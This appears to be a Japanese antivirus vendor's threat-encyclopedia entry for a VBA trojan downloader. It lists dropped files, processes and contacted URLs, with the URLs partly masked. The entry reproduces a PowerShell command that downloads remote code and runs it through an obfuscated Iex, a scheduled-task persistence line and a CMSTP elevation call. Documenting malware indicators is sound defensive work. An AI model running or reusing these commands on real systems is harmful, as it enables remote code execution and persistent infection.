解析者: Maria Emreen Viray   

 別名:

Trojan-Downloader.VBA.Agent (IKARUS)

 プラットフォーム:

Windows

 危険度:
 ダメージ度:
 感染力:
 感染確認数:
 情報漏えい:

  • マルウェアタイプ:
    トロイの木馬型

  • 破壊活動の有無:
    なし

  • 暗号化:
     

  • 感染報告の有無 :
    はい

  概要

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

  詳細

ファイルサイズ 117,037 bytes
タイプ Other
メモリ常駐 なし
発見日 2022年2月1日

侵入方法

マルウェアは、他のマルウェアに作成されるか、悪意あるWebサイトからユーザが誤ってダウンロードすることによりコンピュータに侵入します。

インストール

マルウェアは、以下のファイルを作成します。

  • %Public%\peee.com
  • %Public%\hahahha.vbs
  • %User Temp%\CMSTP.inf

マルウェアは、以下のプロセスを追加します。

  • %Public%\peee.com http://www.j.mp/akd{BLOCKED}
  • powershell.exe -w h -NoProfile -ExecutionPolicy Bypass -Command (New-Object IO.StreamReader([Net.HttpWebRequest]::Create('https://www.me{BLOCKED}.com/file/ey{BLOCKED}/9.dll/file').GetResponse().GetResponseStream())).ReadToEnd()|I'e'x
  • schtasks /create /sc MINUTE /mo 182 /tn asasdwddasdeyu /F /tr """%Public%/peee.com""""""https://www.me{BLOCKED}.com/file/ch{BLOCKED}/9.htm/file"""
  • "%Windows%\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"
  • "%System%\cmstp.exe" /au %User Temp%\CMSTP.inf
  • Wscript %Public%\hahahha.vbs
  • "%System%\Wscript.exe" "%Public%\hahahha.vbs" /elevate

その他

マルウェアは、以下の不正なWebサイトにアクセスします。

  • http://www.j.mp/akd{BLOCKED}
  • http://bit.ly/akd{BLOCKED}
  • https://www.me{BLOCKED}.com/file/4v{BLOCKED}/9.htm/file
  • https://www.me{BLOCKED}.com/file/ey{BLOCKED}/9.dll/file
  • https://www.me{BLOCKED}.com/file/vg{BLOCKED}/F2.vbs/file

以下のスケジュールされたタスクを追加します:

  • Task Name: asasdwddasdeyu
  • Action: """%Public%/peee.com""""""https://www.me{BLOCKED}.com/file/ch{BLOCKED}/9.htm/file"""